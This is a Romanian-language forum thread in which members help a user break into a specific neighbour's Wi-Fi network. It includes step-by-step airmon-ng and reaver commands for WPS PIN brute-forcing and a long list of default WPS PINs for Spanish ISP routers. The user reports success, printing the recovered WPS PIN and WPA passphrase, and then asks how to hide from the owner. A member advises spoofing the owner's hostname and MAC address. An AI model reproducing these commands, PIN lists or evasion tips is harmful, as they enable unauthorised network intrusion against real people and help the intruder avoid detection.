Jump to content
ionutz15

Ideei hacking TKIP/AES

By ionutz15, in Wireless Pentesting

Recommended Posts

ionutz15 Newbie

ionutz15

Posted
  • Author
Posted (edited)
Dupa cate stiu eu de la prietenii mei spanioli ,retelele astea wlan_xxxx au parola "por defecto" ,care se gaseste cu ajutorul

unor keygeneratoare , dupa MAC. Problema e ca nu sunt generatoare chiar pentru toate tipurile de wlan.

Incearca , totusi , Nuevo Swifi Keygen: 1.0.0.1 , nu e nimic sigur....

Stiam de chestia asta cu parola "por defecto", dar se pare ca nu este aceea ce mi-o genereaza...

Daca a schimbato trebuia sa fie WPA2?

Edited by ionutz15
Link to comment
Share on other sites
sorelian Newbie

sorelian

Posted
Posted

Pai, daca a schimbato , e tot wpa/wpa2 ,doar ca nu mai e parola default....

In cazul asta , cu handshake , varianta clasica cu dictionarul e pierdere de vreme.Ar trebui sa ai un dictionar adecvat...

Mai ramane varianta cu reaver ....daca are wps activat.

Totusi, mai cauta generatoare de key pentru wlan_ , pentru ca ,in Spania, 99% dintre utilizatorii de wireless , nu schimba

parola by default...doar 1% sunt avizati si se securizeaza strong.

Link to comment
Share on other sites
hirosima Newbie

hirosima

Posted
Posted
Pai, daca a schimbato , e tot wpa/wpa2 ,doar ca nu mai e parola default....

In cazul asta , cu handshake , varianta clasica cu dictionarul e pierdere de vreme.Ar trebui sa ai un dictionar adecvat...

Mai ramane varianta cu reaver ....daca are wps activat.

Totusi, mai cauta generatoare de key pentru wlan_ , pentru ca ,in Spania, 99% dintre utilizatorii de wireless , nu schimba

parola by default...doar 1% sunt avizati si se securizeaza strong.

eu foloseam back track si in cateva secunde iti oferea parola, mai ales daca este default. Poti incerca nu ai nimic de pierdut!

Link to comment
Share on other sites
darknwo Newbie

darknwo

Posted
Posted (edited)

Nu mai incerca cu niciun program inafara de reaver ca nu ai sa rezolvi nimic.

Pentru acel MAC ce il are reteaua aia nu se poate genera parola din fabrica pentru ca nu au descoperit algoritmul.

Foloseste reaver pentru a afla PIN-ul (DE 8 CIFRE) de la WPS si dupa iti da parola WPA/WPA2.

Daca te ajuta ceva pentru acel mac PIN-ul poate incepe cu 4315 sau 9901, deci ar trebui sa faci cam asa dupa ce ai instalat aircrack + reaver.

1. sudo airmon-ng start wlan0
2. sudo reaver -i mon0 -b 5C:33:8E:XX:XX:XX -vv -p 4315 SAU
    sudo reaver -i mon0 -b 5C:33:8E:XX:XX:XX -vv -p 9901

Le incerci pe rand si vezi cu care iti iese.

PS: Ai nevoie de mai multe chestii pentru ca reaver sa functioneze, cauta pe Google tutoriale ca sa nu mai scriu eu aici.

PS2: Vezi ca dureaza ceva "procesul" cu reaver.

PS3: Inlocuiesti in loc de 5C:33:8E........ bineinteles cu MAC-ul acelei retele.

Edited by darknwo
Link to comment
Share on other sites
NOVATu Newbie

NOVATu

Posted
Posted

Aici ai lista cu vulnerabilitati routere,adica care routere sunt vulnerabile plus timpul plus patronul daca se cunoaste:

Si aici lista cu patronii care se cunosc in spania:

WLAN TIMOFÓNICAS :

ESSID: WLAN_XXXX

BSSID: 00:19:15:XX:XX:XX

MODELO: AW4062

V. Firm: –

Wps Activado: Si

PIN: 12345670

——-

WLAN_XXXX

MAC:30:39:F2

Wps activado:si

Pin:1653XXXX

——-

ESSID: WLAN_XXXX

BSSID: 00:19:15:XX:XX:XX

MODELO:Tecom Co.Ltd

V. Firm: –

Wps Activado: Si

PIN: 12345670

——–

WLAN_XXXX

BSSID: DC:0B:1A

Pin: 1653

fabricante:ADB Broadband SpA

——

bssid: 30:39:F2:7x:xx:xx

essid: WLAN_AAxx

PIN WPS: 1670xxxx

WPA: TCmMSxxxxxxxxxxxxxxx

——–

ESSID: WLAN_XXXX

BSSID: 30:39:F2:XX:XX:XX

MODELO: Broadcom

V. Firm: –

Wps Activado: Si

Inicio PIN: 4329xxxx

——

ESSID: WLAN_XXXX

BSSID: 40:4A:03:XX:XX:XX

MODELO: ZYXELL P-870HW-51A V2

V. Firm: –

Wps Activado: Si

PIN: 11866428

——

ESSID: WLAN_XXXX

BSSID: 30:39:F2:XX:XX:XX

MODELO: –

V. Firm: –

Wps Activado: Si

Inicio PIN: 1670@@@@ // 4329@@@@ // 16538061

——

ESSID: WLAN_XXXX

BSSID: F4:3E:61:XX:XX:XX

MODELO: –

V. Firm: –

Wps Activado: Si

PIN: 12345670

——

ESSID: WLAN_XXXX

BSSID: 00:1A:2B:XX:XX:XX

MODELO: Comtrend Gigabit 802.11n

V. Firm: –

Wps Activado: Si

PIN: 8847@@@@

——

WLAN_XXXX

40:4A:03

WPS defecto: No

PIN – 1186xxxx

——

WLAN_XXXX

30:39:F2

1670xxxx

wps defecto: si

—–

WLAN_XXXX (Las XXXX son 4 números y todos menos el último coinciden con los 4 últimos parámetros de la MAC que cambia un 9 por una A )

Router: ZYXELL P-870HW-51A V2

MAC: 40:4A:03:XX:XX:XX

Pin activado por defecto: 1186XXXX

Contraseña 20 dígitos letras mayúsculas y números mezclados

Encriptación: WPA2-PSK AES

—–

WLAN_XXXX

MAC: 30:39:F2

Wps Activado: Si

PIN: 1653XXXX

——————————————————————————–

JAZZmusicTEL

ESSID: JAZZTEL_XXXX

BSSID: 00:38:72:XX:XX:XX

MODELO: AR-3025un

V. Firm: –

Wps Activado: Si

Inicio PIN: 1562@@@@

——-

ESSID: JAZZTEL_XXXX

BSSID: 00:38:72:XX:XX:XX

MODELO: AR-5387un

V. Firm: –

Wps Activado: Si

Inicio PIN: 1883@@@@

——

ESSID: JAZZTEL_XXXX

BSSID: 00:38:72:XX:XX:XX

MODELO: AR-5387un

V. Firm: –

Wps Activado: No

PIN: 18836486

——

ESSID: JAZZTEL_XXXX

BSSID: 64:68:0C:XX:XX:XX

MODELO: AR-5381u

V. Firm: –

Wps Activado: No

Inicio PIN: 1562@@@@

——

——————————————————————————–

FTsEx

ESSID: FTE-XXXX

BSSID: 84:A8:E4:XX:XX:XX

MODELO: –

V. Firm: –

Wps Activado: Si

Inicio PIN: 7996@@@@

——

ESSID: FTE-XXXX

BSSID: 04:C0:6F:XX:XX:XX

MODELO: –

V. Firm: –

Wps Activado: Si

Inicio PIN: 0751@@@@

——

ESSID: FTE_XXXX

BSSID: 20:2B:C1:XX:XX:XX

MODELO: Huawei HG532C

V. Firm: –

Wps Activado: Si

Inicio PIN: 1957@@@@

—–

FTE-XXXX

MAC: 84:A8:E4

Wps Activado: Si

PIN: 7996XXXX

—–

ESSID: FTE_XXXX

BSSID: 20:2B:C1:XX:XX:XX

MODELO: Huawei HG532C

V. Firm: –

Wps Activado: Si

Inicio PIN: 1957xxxx

—–

FTE-XXXX

MAC: 04:C0:6F

Wps Activado: Si

PIN: 0751XXXX

——————————————————————————–

COno

ESSID: ONO_XXXX (letras y numeros)

BSSID: A0:21:B7:XX:XX:XX

Pin: 6557

WPA clave: 16557XXXXX (10 numeros)

——–

M.A.C.: A0:21:B7:xx:xx:xx

PIN WPS: 0634xxxx

WPA: 634xxxxxxx

M. Router: Netgear

——–

ESSID: ONOXX97

BSSID: 74:44:01:XX:XX:97

MODELO: CG3100D

V. Firm: –

Wps Activado: Sí

PIN: 3555@@@@

——

ESSID: ONOXX19

BSSID: C0:3F:0E:XX:XX: 19

MODELO: CG3100D

V. Firm: –

Wps Activado: Sí

PIN: 8345@@@@

——

ESSID: ONOXXXX

BSSID: C4:3D:C7:XX:XX:XX

MODELO: –

V. Firm: –

Wps Activado: No

PIN: 5141@@@@

——

MAC-C4:3D:C7xxxxxx

ONOxxxx

PIN-5141xxxx

WPS Activado-NO

———–

ONOXXXX

WPS PIN-9522xxxx

WPA-PSK 195221xxxx

MAC-30:46:9Axxxxxx

WPS Activado- NO

—–

WPS PIN: 1504XXXX

WPA PSK: 9150XXXXXX

AP SSID: ONOXXXX

MAC: 30:46:9A:XX:XX:XX

——

WPS PIN-2503

WPA PSK-520

AP SSID-ONO35AE

MAC-CO:3F.0E

——————————————————————————–

Opange

ESSID: Orange-XXXX

BSSID: 5C:33:8E:XX:XX:X

MODELO: –

V. Firm: –

Wps Activado: Sí

PIN: 1111@@@@

——

orange-c6 8)

ap mac-5c:33:8E:xx:xx:xx

wps locked-si

pin-1111xxxx

——-

orange-xxxx

mac-5c:33:8e:xx:XX:xx

wps locked-si

——————————————————————————–

WII

ESSID: WIFIXXXXXX

BSSID: 88:25:2C:XX:XX:X

MODELO: –

V. Firm: –

Wps Activado: Sí

PIN: 7654@@@@

——

LINK

mac-F4:EC:38xxxxxx

PT-link

PIN -1452xxxx

WPS Activado -si

————————–

MAC-F8:D1:11xxxxxx

PT-LINK

PIN-4867xxxx

WPS Activado -si

———————-

MAC-00:18:E7xxxxxx

D-LINK

PIN-1553xxxx

WPS Activado -si

————-

MAC-B0:48:7Axxxxxx

KTM

PIN-0055xxxx

————

Marca/modelo: D-Link DIR-600

MAC: 1C:7E:E5:XX:XX:XX

PIN por defecto: 6041XXXX

Link to comment
Share on other sites
darknwo Newbie

darknwo

Posted
Posted

@ionutz - depinde foarte mult si cat de puternic este semnalul, daca reaver suporta placa ta wireless. Trebuie sa detaliezi mai mult, cu "nu merge" nu e deajuns. Spune ce eroare a dat, sau ce nu a mers. Procesul poate dura in jur de 10 ore. dar cum deja ti-am dat jumatate din PIN ar trebui sa dureze mai putin. Poti incerca si fara parametrul -p si sa o iei de la 0.

Link to comment
Share on other sites
ionutz15 Newbie

ionutz15

Posted
  • Author
Posted
@ionutz - depinde foarte mult si cat de puternic este semnalul, daca reaver suporta placa ta wireless. Trebuie sa detaliezi mai mult, cu "nu merge" nu e deajuns. Spune ce eroare a dat, sau ce nu a mers. Procesul poate dura in jur de 10 ore. dar cum deja ti-am dat jumatate din PIN ar trebui sa dureze mai putin. Poti incerca si fara parametrul -p si sa o iei de la 0.

·Intensitate semnal: 93%

·Da, reaver suporta placa wifi.

·Mac complet al retelei: 5C:33:8E:A2:7C:EC

Practic, l-am lasat 2 zile aprox. si nu a facut nimic...

Am incercat si cu si fara parametrul -p...

Ms frumos pt timpul acordat.

Link to comment
Share on other sites
sorelian Newbie

sorelian

Posted
Posted
·Intensitate semnal: 93%

·Da, reaver suporta placa wifi.

·Mac complet al retelei: 5C:33:8E:A2:7C:EC

Practic, l-am lasat 2 zile aprox. si nu a facut nimic...

Nu inteleg ce inseamna ca nu a facut nimic reaver...o astfel de formulare are sens daca routerul nu are wps activat...

si atunci vorbim degeaba despre atacul de tip reaver.

Daca, totusi ,routerul are wps activat ,uite ce am gasit, intro baza de date din wpscrackgui 1.2.0 din wifislax 4.3 rc3 ,

pentru MAC-ul tau. Sunt variante de pin posibile...

pinxh.png

Link to comment
Share on other sites
ionutz15 Newbie

ionutz15

Posted
  • Author
Posted (edited)
Nu inteleg ce inseamna ca nu a facut nimic reaver...o astfel de formulare are sens daca routerul nu are wps activat...

si atunci vorbim degeaba despre atacul de tip reaver.

Daca, totusi ,routerul are wps activat ,uite ce am gasit, intro baza de date din wpscrackgui 1.2.0 din wifislax 4.3 rc3 ,

pentru MAC-ul tau. Sunt variante de pin posibile...

pinxh.png

Sa probez...Revin cu un edit.

L.E

[+] Waiting for beacon from 5C:33:8E:A2:7C:EC

[+] Switching mon0 to channel 5

[+] Associated with 5C:33:8E:A2:7C:EC (ESSID: WLAN_7CEC)

[+] Trying pin 82848439

[+] Sending EAPOL START request

[+] Received identity request

[+] Sending identity response

[+] Received M1 message

[+] Sending M2 message

[+] Received M3 message

[+] Sending M4 message

[+] Received WSC NACK

[+] Sending WSC NACK

[+] Trying pin 82848439

[+] Sending EAPOL START request

[!] WARNING: Receive timeout occurred

[+] Sending EAPOL START request

[+] Sending WSC NACK

[!] WPS transaction failed (code: 0x03), re-trying last pin

[+] Trying pin 82848439

[!] WPS transaction failed (code: 0x03), re-trying last pin

[+] Trying pin 11765592

[+] Sending EAPOL START request

[+] Received identity request

[+] Sending identity response

[+] Received M1 message

[+] Sending M2 message

[+] Received M3 message

[+] Sending M4 message

[+] Received WSC NACK

[+] Sending WSC NACK

[+] Trying pin 11765592

[+] Sending EAPOL START request

[!] WARNING: Receive timeout occurred

[+] Sending EAPOL START request

Deocamdata am incercat cu astea doua...Acum incerc cu cele XXXX.

Edited by ionutz15
Link to comment
Share on other sites
bruttus139 Newbie

bruttus139

Posted
Posted

Routerul ala este protejat la atacuri pe pin,si la fiecare 10 incercari ia pauza,asa ca dureaza sa scoti parola de la el.Daca nu ai raspuns de pina la 10 secunde pe fiecare pin este posibil sa nu reusesti sau sa astepti citeva zile pina afla parola.

Descarca wifislax,si foloseste baza de date de la wpscrakgui ca vad ca are si pinul tau(sau parte din el) si asa nu mai pierzi timp.

Link to comment
Share on other sites
ionutz15 Newbie

ionutz15

Posted
  • Author
Posted
Routerul ala este protejat la atacuri pe pin,si la fiecare 10 incercari ia pauza,asa ca dureaza sa scoti parola de la el.Daca nu ai raspuns de pina la 10 secunde pe fiecare pin este posibil sa nu reusesti sau sa astepti citeva zile pina afla parola.

Descarca wifislax,si foloseste baza de date de la wpscrakgui ca vad ca are si pinul tau(sau parte din el) si asa nu mai pierzi timp.

Dece nu ma lasa sa dau Buscar?

scren.png

Link to comment
Share on other sites
ionutz15 Newbie

ionutz15

Posted
  • Author
Posted (edited)

Am reusit!

[+] WPS PIN: '38944420'

[+] WPA PSK: 'H50MXYIY0FA8DBC0NXXX'

[+] AP SSID: 'WLAN_7CEC'

[+] MAC: 5C:33:8E:A2:7C:EC

L.E:

Am accesat router-ul si am observat:

Sinttulo.jpg

Este vreo un mod sa fac sa dispara ca nu sunt conectat?

Si aici la fel:

DHCP CLIENTS LIST

Host Name IP Address MAC Address

| 192.168.1.37 | 00:12:34:86:XX:XX

aNoNyN-PC | 192.168.1.38 | 48:02:2A:XX:XX:XX

Cel in bold este al meu...cum fac sa dispara? :S

Edited by ionutz15
Link to comment
Share on other sites
bruttus139 Newbie

bruttus139

Posted
Posted

Nu poti sa faci sa dispara,chiar si daca stergi logul tot ramine urma.Eventual poti schimba numele calculatorului,MAC-ul,si sa le pui pe cele ale proprietarului,asa nu stie pe cine sa caute in caz de ceva,dar cind se va conecta si el,va da eroare IP si MAC si atunci isi va da seama (cel putin nu va sti cine a mai intrat)

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...